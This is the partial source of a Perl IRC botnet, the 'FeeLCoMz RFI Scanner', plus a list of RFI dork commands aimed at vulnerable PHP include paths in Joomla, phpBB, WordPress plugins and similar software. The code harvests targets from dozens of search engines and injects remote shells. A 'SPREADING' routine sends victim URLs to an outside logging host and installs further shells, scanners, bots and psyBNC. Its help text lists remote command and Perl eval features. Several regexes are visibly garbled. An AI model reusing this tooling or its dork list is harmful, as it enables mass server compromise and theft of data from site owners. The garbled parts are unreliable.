(.+?)<\/span>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Clusty","$h");
}
if ( $q =~ /next/ ) {
my $nxurl = $1; msgn($dbgchan,"Clusty",htmltourl($nxurl));
}
while ( $q =~ m/next/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/Next/ ) {
my $h = $1; $h =~ s/,//g; msgn($dbgchan,"Ask","$h");
}
while ( $q =~ m/id=\"(.+?)\" href=\"http:\/\/(.+?)\" onmousedown/g ) {
my $l = $2 ; if ($l !~ /google|www.ask.com/) { push (@daftar, $l); }
}
for ($p=1;$p<=$max;$p++) { $q = bukasitus("http://www.ask.com/web?q=".$key."&o=0&l=dir&page=".$p); while ( $q =~ m/id=\"(.+?)\" href=\"http:\/\/(.+?)\" onmousedown/g ) { my $l = $2 ; if ($l !~ /google|www.ask.com/) { push (@daftar, $l); } } } return @daftar; } ## LYCOS ## sub se_lycos { my ($chan,$key,$nf) = @_; my @daftar; my $num = 10; my $max = 200; my $p; #my $url = "http://localhost/search/search.lycos.com.htm"; my $url = "http://search.lycos.com/?loc=searchbox&tab=web&adf=on&query=".$key."&submit=image"; my $murl = "http://search.lycos.com/"; my $nxurl; my $q = bukasitus($url); if ( $q =~ /Next/ ) {
my $nxurl = $1; msgn($dbgchan,"Lycos","$nxurl");
}
while ( $q =~ m/(.+?)<\/span>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Gigablast","$h");
}
if ( $q =~ // ) {
my $nxurl = $1; msgn($dbgchan,"Gigablast","$nxurl");
}
while ( $q =~ m//g ) { push (@daftar, $1); }
while ( $q =~ // ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m//g ) { push (@daftar, $1); }
}
return @daftar;
}
## MAMMA ##
sub se_mamma {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 10; my $p = 1;
#my $url = "http://localhost/search/mamma.com.htm";
my $url = "http://mamma.com/Mamma?utfout=1&query=".$key."&qtype=0&rpp=50&cb=Mamma&index=".$p;
my $murl;
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /Search Results<\/b> .*? of (.*?) for/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Mamma","$h");
}
if ( $q =~ /Next/ ) {
my $h = $1; $h =~ s/,//g; msgn($dbgchan,"Mamma","$h");
}
while ( $q =~ m/http:\/\/(.*?)\<\/span>/g ) {
my $l = $1 ; if ($l !~ /mamma.com/) { push (@daftar, $l); }
}
while ( $q =~ /Next/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/http:\/\/(.*?)\<\/span>/g ) {
my $l = $1 ; if ($l !~ /mamma.com/) { push (@daftar, $l); }
}
}
return @daftar;
}
## DMOZ ##
sub se_dmoz {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 20; my $max = 5000; my $p = 1;
#my $url = "http://localhost/search/search.dmoz.org.htm";
my $url = "http://search.dmoz.org/cgi-bin/search?search=".$key;
my $murl = "http://search.dmoz.org/cgi-bin/";
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /Open Directory Sites<\/b><\/font> \((.+?) of (.+?)\)/ ) {
my $h = $2; $h =~ s/,//g; msgt($chan,"Dmoz","$h");
}
if ( $q =~ /Next<\/a>\">/ ) {
my $nxurl = $1; msgn($dbgchan,"Dmoz","$nxurl");
}
while ( $q =~ m/
# Next<\/a>/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/



# (.*?) risultati per / ) {
my $h = $1; $h =~ s/,//g; $h =~ s/\.//g;
msgt($chan,"Virgilio","$h");
}
if ( $q =~ /Avanti/ ) {
my $nxurl = $1; msgn($dbgchan,"Virgilio","$nxurl");
}
while ( $q =~ m/



Avanti/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/
<= $max; $p += $num ) { my $url = "http://suche.web.de/search/web/?pageIndex=".$p."&su=".$key."&y=0&x=0&mc=suche\@web\@navigation\@zahlen.suche\@web"; my $q = bukasitus($url); while ( $q =~ m/http:\/\/(.*?)<\/span>/g ) { push (@daftar, $1); }
if ( $q !~ /http:\/\/(.*?)<\/span>/ ) { return @daftar; }
}
return @daftar;
}
## FIREBALL ##
sub se_fireball {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 1; my $max = 500; my $p;
for ( $p = 0;$p <= $max; $p += $num ) { my $url = "http://suche.fireball.de/cgi-bin/pursuit?pag=".$p."&query=".$key."&cat=fb_web&enc=utf-8"; my $q = bukasitus($url); while ( $q =~ m/<= $max; $p += $num ) { my $url = "http://www.hotbot.com/?query=".$key."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$p; my $q = bukasitus($url); while ( $q =~ m/http:\/\/(.+?)<\/span>/g ) {
my $l = $1 ; if ($l !~ /hotbot/) { push (@daftar, $l); }
}
if ( $q !~ /http:\/\/(.+?)<\/span>/ ) { return @daftar; }
}
return @daftar;
}
## NETSCAPE (Ga pake) ##
sub se_netscape {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 1; my $max = 10; my $p;
for ( $p = 0;$p <= $max; $p += $num ) { my $url = "http://search.netscape.com/search/search?query=".$key."&page=".$p."&y=0&x=0&st=webresults"; my $q = bukasitus($url); while ( $q =~ m/url\">http:\/\/(.*?)<\/p>/g ) {
my $l = $1 ; if ($l !~ /search.netscape/) { push (@daftar, $l); }
}
if ( $q !~ /url\">http:\/\/(.*?)<\/p>/ ) { return @daftar; }
}
return @daftar;
}
## WEBCRAWLER ##
sub se_webcrawler {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 500; my $p;
for ( $p = 0;$p <= $max; $p++ ) { $num += $num; my $url = "http://www.webcrawler.com/webcrawler/ws/redir/qcat=Web/qkw=".$key."/qcoll=relevance/zoom=off/bepersistence=true/qi=".$num."/qk=50/page=".$p."/_iceUrlFlag=11?_IceUrl=true"; my $q = bukasitus($url); while ( $q =~ m/status='http:\/\/(.*?)';/g ) { my $l = $1 ; if ($l !~ /webcrawler|google/) { push (@daftar, $l); } } if ( $q !~ /wsPagerNext/ ) { return @daftar; } } return @daftar; } ## EUROSEEK ## sub se_euroseek { my ($chan,$key,$nf) = @_; my @daftar; my $num = 10; my $max = 6000; my $p; for ( $p = 0;$p <= $max; $p+=$num ) { my $url = "http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$p."&string=".$key; my $q = bukasitus($url); while ( $q =~ m//g ) { push (@daftar, $1); }
if ( $q !~ /Next/ ) { return @daftar; }
}
return @daftar;
}
## ABACHO ##
sub se_abacho {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 10; my $max = 1000; my $p = 0;
for ( $p = 0;$p <= $max; $p += $num ) { my $url = "http://search.abacho.com/it/abacho.it/index.cfm?offset=".$p."&poffset=0&StartCounter=".$p."&q=".$key."&a=&b=&country=it&page=&d_html=&d_pdf=&d_msdoc=&d_xls=&d_ppt=&mesearchkey=&cluster=&coop="; my $q = bukasitus($url); while ( $q =~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g ) { push (@daftar, $1); }
if ( $q !~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g ) { return @daftar; }
if ( $q =~ /We didn't find any results matching your query/ ) { return @daftar; }
}
return @daftar;
}
## END OF RUTIN SEARCH ENGINE ##

##[ BUG JOOMLA ]##
sub bugjoomla {
my $mode = $_[0];
my @bugz;
system("lwp-download ".$joomlaz);
system("curl -O ".$joomlaz);
system("wget ".$joomlaz);
open(FILE,"< baris =" 0;" buff ="~" r =" ) { $r =~ s/\n//g; push(@bugz,$r); }
close(FILE);
f_hapus("joomla.txt*");
return @bugz;
}
}

##[ MILW0RM ]##
sub milw0rm {
my ($chan,$key) = @_;
my $max = 10; my $i;
#my $q = bukasitus("http://localhost/milw0rm_rfi.htm");
my $q = bukasitus("http://milw0rm.com/search.php?dong=".urlen($key));
irc_msg($chan," 0,1 [ milw0rm.com ] 9 $key ");
while ( $q =~ m/(.*?)<\/a>/g ) {
$i++;
my ($exp,$judul) = ($1,$2);
irc_msg($chan,$colz{1}." $judul 15http://milw0rm.com/exploits/$exp ");
sleep(1);
return if ($i == $max);
}
}

##[ BERSIH DORK ]##
sub bersihdork {
my ($chan,$dork) = @_;
if ( $dork =~ /inurl:|allinurl:|intext:|allintext:|intitle:|allintitle:/ ) {
irc_msg($chan,$colz{1}." Membersihkan kata kunci Google.. ");
$dork =~ s/^inurl://g;
$dork =~ s/^allinurl://g;
$dork =~ s/^intext://g;
$dork =~ s/^allintext://g;
$dork =~ s/^intitle://g;
$dork =~ s/^allintitle://g;
}
return $dork;
}

##[ SORTIR LINK ]##
sub lnk_sortir {
my @unik = ();
my %ada = ();
foreach my $e ( @_ ) {
next if $ada{ $e }++;
push (@unik, $e);
}
return @unik;
}

##[ SARING LINK ]##
sub lnk_filter {
my @unik = ();
foreach my $url ( @_ ) {
my $jelek = 0;
foreach my $b ( @badlinkz ) {
if ($url =~ /$b/) { $jelek = 1; }
}
if ($jelek == 0) { push (@unik, $url); }
}
return @unik;
}

##[ SUBLINK ]##
sub lnk_sub {
my $link = $_[0];
my (@links,$path);
my ($host,@paths) = split(/\//,$link);
$host .= "/";
push (@links,$host);
foreach my $e (@paths) {
if ($e) {
$path .= $e."/";
my $sublink = $host.$path;
push (@links,$sublink);
}
}
return @links;
}

##[ INFO OS ]##
sub info_os {
my $url = $_[0];
my @info;
my $h = bukasitus($url.$fx29id2."??");
my ($safe,$os,$uname,$server,$user,$uid,$dir,$perm,$hdd,$disfunc);
while ( $h =~ m/
SAFE: (.+?)
/g ) { $safe = $1; }
while ( $h =~ m/
OS: (.+?)
/g ) { $os = $1; }
while ( $h =~ m/
UNAME: (.+?)
/g ) { $uname = $1; }
while ( $h =~ m/
SERVER: (.+?)
/g ) { $server = $1; }
while ( $h =~ m/
USER: (.+?)
/g ) { $user = $1; }
while ( $h =~ m/
UID: (.+?)
/g ) { $uid = $1; }
while ( $h =~ m/
DIR: (.+?)
/g ) { $dir = $1; }
while ( $h =~ m/
PERM: (.+?)
/g ) { $perm = $1; }
while ( $h =~ m/
HDD: (.+?)
/g ) { $hdd = $1; }
while ( $h =~ m/
DISFUNC: (.+?)
/g ) { $disfunc = $1; }
push (@info,$safe,$os,$uname,$server,$user,$uid,$dir,$perm,$hdd,$disfunc);
return @info;
}

##[ SAFEMODE INFO ]##
sub safemode {
my ($type,$chan,$situs,$bug,$engine) = @_;
my $safemode; my $vurn; my $sb;
if ($type == 1) { $vurn = "http://".$situs.$bug; $sb = $vurn." 14".$fx29sh."?"; }
else { $vurn = $situs; $sb = $vurn; }
my ($safe,$os,$uname,$server,$user,$uid,$dir,$perm,$hdd,$disfunc) = info_os($vurn);
if ($safe =~ /OFF/) { $safemode = " 4OFF"; } elsif ($safe =~ /ON/) { $safemode =" 9ON"; } else { $safemode =" 0-"; }
if ($disfunc) { $disfunc = " 9[ Disfunc ] 0[ 7 $disfunc 0]"; } else { $disfunc = ""; }
if ($perm =~/W/) { $perm = " 12$perm"; } else { $perm = " 4$perm"; }
my $S1 = " 9,1 [ ".$safemode." 9] 9[ $os ] 0[ $sb 0] ";
my $S2 = " 9,1 [ Uname ] 0[ $uname ] 9 [ User ] 0[ $user / $uid ] 9[ Server ] 0[ $server ] ";
my $S3 = " 9,1 [ Dir ] 0[ $dir $perm 0] 9[ HDD ] 0[ 0 $hdd 0] $disfunc ";
if ($type == 1) {
irc_msg($chanx,$S1); irc_msg($chanx,$S2); irc_msg($chanx,$S3);
##[ SPREADING ]##
my $q = bukasitus($vurn.$spread."?&modez=shellz");
if ($q =~ /Writed to (.+?)!/) { irc_msg($chanx," 9,1 [ Shell ] 0[ $1 0] "); }
bukasitus("http://uaedesign.com/xml/logz/loggerz.php?&safe=".$safe."&teks=".urlen($vurn));
bukasitus($vurn.$spread."?&modez=scannerz");
bukasitus($vurn.$spread."?&modez=botz");
bukasitus($vurn.$spread."?&modez=psybnc");
sleep($conf{sleepz});
irc_msg($chan,$colz{3}.$engine.$colz{4}) if ($engine);
}
irc_msg($chan,$S1); irc_msg($chan,$S2); irc_msg($chan,$S3);
}

##[ CEK SHELL ]##
sub cek_shell {
my ($chan,$nick,$situs) = @_;
my $q = bukasitus($situs.$fx29id."?");
print $q;
if ( $q =~ /FeeLCoMz/ ) { safemode(2,$chan,$situs,"",""); }
else { irc_msg($chan,$nick.", targetnya BozoK cOOOk!"); }
}

##[ CEK RESPON ]##
sub cek_respon {
my $chan = $_[0];
my ($q1,$q2,$q3) = (bukasitus($fx29id),bukasitus($fx29id2),bukasitus($fx29sh));
my ($rid,$rid2,$rsh,$stat);
if ( $q1 =~ /Fx29ID/ ) { $rid = " 0OK "; $stat = 1; } else { $rid = " 4ERROR! "; $stat = 0; }
if ( $q2 =~ /Fx29ID/ ) { $rid2 = " 0OK "; $stat += 1; } else { $rid2 = " 4ERROR! "; $stat += 0; }
if ( $q3 =~ /FaTaLisTiCz_Fx/ ) { $rsh = " 0OK "; } else { $rsh = " 4ERROR! "; }
irc_msg($chan,$colz{1}."Fx29ID: $rid 9Fx29ID2: $rid2 9Fx29Sh: $rsh".$colz{2});
return $stat;
}

##[ CEK DORK ]##
sub cek_dork {
my $dork = $_[0];
foreach my $d (@baddorkz) { if ($dork =~ /$d/) { return 1; } }
return 0;
}

##[ CEK BUG ]##
sub cek_bug {
my $bug = $_[0];
foreach my $b (@badbugz) { if ($bug =~ /$b/) { return 1; } }
return 0;
}

##[ RUTIN PENANGANAN FILE ]##
sub f_hapus { my $file = $_[0]; system("rm $file"); }
sub f_simpan {
my ($nf,$hc) = @_;
my $fh;
open( $fh, ">>", $nf );
my @slink = lnk_sub($hc);
foreach my $s (@slink) { print $fh "$s\n"; }
close $fh;
}
sub f_simpan2 {
my ($nf,$isi) = @_;
my $fh;
open( $fh, ">", $nf ); print $fh "$isi\n"; close $fh;
}
sub f_simpan2b {
my ($nf,$isi) = @_;
my $fh;
open( $fh, ">>", $nf ); print $fh "$isi\n"; close $fh;
}

##[ HTTP QUERY ]##
sub bukasitus {
my $url = $_[0];
my $request = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new;
$ua->timeout($conf{timeout});
$ua->agent('Mozilla/5.0');
my $response = $ua->request($request);
if ($response->is_success) { return $response->content; }
else { return $response->status_line; }
}
sub bukasitus2 {
my $url = $_[0];
my $ua = LWP::UserAgent->new;
$ua->timeout($conf{timeout});
$ua->agent('Mozilla/5.0');
my $response = $ua->get($url);
if ($response->is_success) { return $response->content; }
else { return $response->status_line; }
}
sub bukasitus3 {
my $url = $_[0];
my $host = $url;
my $query = $url;
my $isi; my $kirim;
my $uagent = "Mozilla/5.0";
$host =~ s/http:\/\/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
eval {
my $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || return;
$kirim = "GET ".$query." HTTP/1.1\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$uagent."\r\n\r\n";
print $sock $kirim;
my @r = <$sock>;
$isi = "@r";
close($sock);
};
return $isi;
}

##[ ENCODE/DECODE ]##
sub htmltourl { my $str = $_[0]; $str =~ s/&/&/g; return $str; }
sub urlen {
my $str = $_[0];
#$str =~ s/\+/\%2B/g;
$str =~ s/ /\+/g;
$str =~ s/@/\%40/g;
$str =~ s/\//\%2F/g;
$str =~ s/&/\%26/g;
$str =~ s/\"/\%22/g;
$str =~ s/,/\%2C/g;
$str =~ s/\\/\%5C/g;
$str =~ s/:/\%3A/g;
$str =~ s/\[/\%5B/g;
$str =~ s/\]/\%5D/g;
$str =~ s/\?/\%3F/g;
$str =~ s/\=/\%3D/g;
$str =~ s/\|/\%7C/g;
return $str;
}
sub urlde {
my $str = $_[0];
$str =~ s/\+/ /g;
$str =~ s/\%2B/\+/g;
$str =~ s/\%40/@/g;
$str =~ s/\%2E/\./g;
$str =~ s/\%2F/\//g;
$str =~ s/\%26/&/g;
$str =~ s/\%22/\"/g;
$str =~ s/\%2C/,/g;
$str =~ s/\%5C/\\/g;
$str =~ s/\%3A/:/g;
$str =~ s/\%5[B|b]/\[/g;
$str =~ s/\%5[D|d]/\]/g;
$str =~ s/\%3F/\?/g;
$str =~ s/\%3D/\=/g;
$str =~ s/\%7C/\|/g;
return $str;
}
sub cryptz { return crypt($_[0],"feelcomz"); }

##[ TRIMMER CRLF ]##
sub trimrn {
my $str = $_[0];
if (!$str) { return ""; }
$str =~ s/\r// if ($str);
$str =~ s/\n//;
return $str;
}


##[ INFO BOT ]##
sub bot_info {
my $chan = $_[0];
my $hlogo = " 0,1 [ i ] 9 ";
my $uname = `uname -a`;
my $uid = `id`;
my $uptime = `uptime`;
my @info = (
$hlogo." 0FeeLCoMz RFI Scanner $versi Info ",
$hlogo."Written under 0ActivePerl 5.8.8 Build 820 9by 0FaTaLisTiCz_Fx (FeeLCoMz Community) ",
$hlogo."Uname: 0 $uname ",
$hlogo."Uid: 0 $uid ",
$hlogo."Uptime: 0 $uptime ",
);
foreach my $m(@info) { irc_msg($chan,$m); }
}

##[ HELP BOT ]##
sub bot_help {
my ($chan,$level) = @_;
my $hsepz = " 0,1 [ ! ] 0";
my $hlogo = " 0,1 [ ! ] 9".$cmdpre;
my @help; my $i;
my @hlp1 = (
$hsepz."FeeLCoMz RFI Scanner $versi Help ",
$hlogo."scan|scan2 0? 15 Memulai scanner | scanner & Eksploit RFI ",
$hlogo."milw0rm 0? 15 Mencari daftar bug di milw0rm ",
$hlogo."respon 0? 15 Cek Respon & Injector RFI ",
$hlogo."urlen|urlde 0? 15 Encoder/Decoder URL ",
$hlogo."cek 0? 15 Cek RFI shell ",
$hlogo."info 0? 15 Informasi bot ",
$hlogo."auth 0? 15 Login ke bot ",
);
my @hlp2 = (
$hsepz."User Commands: ",
$hlogo."joomla 0? 15 Memulai scanner & Eksploit RFI Joomla ",
$hlogo."hitung 0? 15 Mengganti hitungan proses eksploitasi ",
$hlogo."cryptz 0? 15 Membuat password yg terenkripsi ",
$hlogo."join|part 0? 15 Join/Part channel ",
$hlogo."nick 0? 15 Ganti nick bot ",
$hlogo."logout 0? 15 Logout dari bot ",
);
my @hlp3 = (
$hsepz."Admin Commands: ",
$hlogo."crespon[1/2]|cshell|cspread 0? 15 Mengganti respon/injector/spread/spread2 RFI ",
$hlogo."rfipid 0? 15 Mengganti RFI PID ",
$hlogo."spy 0? 15 Menampilkan konfigurasi Spy ",
$hlogo."spyhost 0? 15 Channel host buat spy ",
$hlogo."spychan 0? 15 Channel yang akan di spy ",
$hlogo."spyword 0? 15 Kata yg di akan spy ",
$hlogo."raw 0? 15 Perintah Raw IRC ",
$hlogo."cmd 0? 15 Mengeksekusi perintah di shell ",
$hlogo."eval 0? 15 Mengeksekusi kode perl ",
$hlogo."quit 0? 15 Quit dari IRC ",
$hlogo."keluar 0? 15 Quit dari IRC & Matikan semua proses Perl ",
);
if ( $level == 1 ) { push(@help,@hlp1); }
elsif ( $level == 2 ) { push(@help,@hlp2); }
elsif ( $level == 3 ) { push(@help,@hlp3); }
foreach my $m (@help) { irc_msg($chan,$m); $i++; if ( $i % $conf{linez} == 0 ) { sleep($conf{sleepz}); } }
}

##[ CUSTOM MESSAGE ]##
sub msge { my ($chan,$se,$res) = @_; irc_msg($chan," 7,1 ".$se." 15 ".$res." "); }
sub msgi { my ($chan,$judul,$info) = @_; irc_msg($chan," 0,1 [ $judul ] 9 $info "); }
sub msgn { my ($chan,$se,$nxurl) = @_; irc_msg($chan," 8,1 ".$se." 15 ".$nxurl." "); }
sub msgr { my ($chan,$se,$totr,$clr) = @_; irc_msg($chan," 9,1 ".$se." 15 ".$totr." 0 ".$clr." "); }
sub msgt { my ($chan,$se,$res) = @_; irc_msg($chan," 3,1 ".$se." 15 ".$res." "); }
sub ntci { my ($chan,$judul,$info) = @_; irc_ntc($chan," 0,1 [ $judul ] 9 $info "); }

##[ PERINTAH RAW IRC ]##
sub irc_raw { my $data = $_[0]; print $sock "$data\r\n"; }
sub irc_nick { my $nick = $_[0]; irc_raw("NICK $nick"); }
sub irc_user { my $ident = $_[0]; irc_raw("USER $ident localhost * :FeeLScaNz $versi"); }
sub irc_msg { my ($to,$psn) = @_; irc_raw("PRIVMSG $to :$psn"); }
sub irc_act { my ($to,$psn) = @_; irc_raw("PRIVMSG $to : ACTION $psn "); }
sub irc_ntc { my ($to,$psn) = @_; irc_raw("NOTICE $to :$psn"); }
sub irc_join { my $to = $_[0]; irc_raw("JOIN $to"); }
sub irc_part { my $to = $_[0]; irc_raw("PART $to"); }
sub irc_quit { my $psn = $_[0]; irc_raw("QUIT :$psn"); exit; }

##########################
##[ FeeLCoMz Community ]##
##########################

kumpulan dork

!scan arcade.php?phpbb_root_path= "POWERNUKE CMS DIAMOND"
!scan //skin/uks_gallery_v3010//write.php?setup[use_category]=1&dir= "skin by uks"
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= "com_extcalendar"
!scan /index.php?option= "/index.php?option=contact"
!scan ?INCLUDE_FOLDER= "?curPos=13"
!scan /skin/happycast_category_lightblack/login.php?dir= "skin by zetyx"
!scan /?_SERVER[DOCUMENT_ROOT]= "index.php?idk=10"
!scan /skin/sirini_simplism_gallery_v4/setup.php?dir= skin by sirini
!scan setup.php?setup[use_category]=1&dir= ggambo4100
!scan config/config_main.php?INC= "Your Search Starts Here"
!scan /playing.php/common/db.php?commonpath= "Copyright Spacial Audio Solutions"
!scan /bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]= "bitrix"
!scan manager/static/view.php?propID=0&INC= "Powered by Etomite CMS"
!scan includes/function_core.php?web_root= "Free Mp3 Search Engine"
!scan /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=

"/skin_shop/"
!scan //skin/daerew_DICAgallery_GD/setup.php?dir= "skin by daerew
!scan view.php?dir= happycast
!scan //png.php?include_path= "poll" poll_id
!scan board/include/bbs.lib.inc.php?site_path= %22%EC%95%8C%EC%A7%80%EB%B3%B4%EB%93%9C%22+site%3A.kr
!scan tools/send_reminders.php?noSet=0&includedir= "WebCalendar v1.0.4"
!scan ///////?cmd&file= "List Users with Pics only?"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= "BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More."
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /?installed_config_file= "PhpJobScheduler"
!scan /pjsfiles/modify.php?installed_config_file= "PhpJobScheduler"
!scan errors.php?error= "/com_rwcards" "/com_rwcards"
!scan //vwar/backup/errors.php?error= "errors.php"
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection

{}//&w=include($_GET[a]);&a= "powered by CMS Made Simple version"
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= "netcat require"
!scan /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= "php?option=com_rwcards" "php?

option=com_rwcards"
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums"
!scan phphtml.php?htmlclass_path= "phphtml.php"






.scan /index.php?_SERVER[DOCUMENT_ROOT]= "powered by Clicknet CMS"
.scan /include/admin.lib.inc.php?site_path= "rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= "Guestbook"
.scan //main.php?_zb_path= "main.php"
.scan //login.php?_zb_path= "login.php"
.scan /////?_SERVER[DOCUMENT_ROOT]= "/board" site:.kr
.scan /admin.php?include_path= "gastenboek"
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= "doceboLms"
.scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= "/PNphpBB2/"
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-NUKE"
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= "boonex"
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= "web3news"
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= "/plugins/sniplets/"
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= "powerd by wordpress"
.scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= "contenido"
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= "phpraider"
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= "phpbb3"
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= "PhpRaider Mod phpbb3"
.scan /admin/templates/template_thumbnail.php?thumb_template= "homePH design"
.scan /administrator/components/com_dbquery/classes/DBQ/admin



scan /index.php?_SERVER[DOCUMENT_ROOT]= "powered by Clicknet CMS"
.scan /include/admin.lib.inc.php?site_path= "rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= "Guestbook"
.scan //main.php?_zb_path= "main.php"
.scan //login.php?_zb_path= "login.php"
.scan /////?_SERVER[DOCUMENT_ROOT]= "/board" site:.kr
.scan /admin.php?include_path= "gastenboek"
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= "doceboLms"
.scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= "/PNphpBB2/"
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-NUKE"
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= "boonex"
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= "web3news"
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= "/plugins/sniplets/"
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= "powerd by wordpress"
.scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= "contenido"
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= "phpraider"
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= "phpbb3"
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= "PhpRaider Mod phpbb3"
.scan /admin/templates/template_thumbnail.php?thumb_template= "homePH design"
.scan /administrator/components/com_dbquery/classes/DBQ/admin


/common.class.php?mosConfig_absolute_path= "index.php?option=com_dbquery"
.scan /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]= "com_competitions" atau "/components/com_competitions/"
.scan /administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path= "com_feederator"
.scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= "MODx CMS"
.scan /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE= "dm-albums"
.scan /mygallery/myfunctions/mygallerybrowser.php?myPath= "inurl:/mygallery/myfunctions/"
.scan /mygallery/myfunctions/mygallerybrowser.php?myPath= "Index of /mygallery/myfunctions"
.scan /mygallery/myfunctions/mygallerybrowser.php?myPath= "inurl:mygallerytmpl.php"
.scan //skin/buzzard_espoon/setup.php?dir= "skin by buzzard"
.scan //skin/daerew_DICAgallery_GD/setup.php?dir= "skin by daerew"
.scan //skin/happycast_category_lightblack/setup.php?dir= "skin by zetyx"
.scan //skin/uks_gallery_v3010//write.php?dir= "skin by uks"
.scan //skin/ggambo7002_board/setup.php?dir= "skin by GGAMBO"
.scan //skin/ggambo7002_board/modify.php?dir= "skin by GGAMBO"
!scan become_editor.php?theme_path= become_editor.php
!scan bad_link.php?theme_path= bad_link.php
!scan webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini= webmail/lib/emailreader_execute_on_each_page.inc.php
!scan mantis/login_page.php?g_meta_include_file= mantis/login_page.php
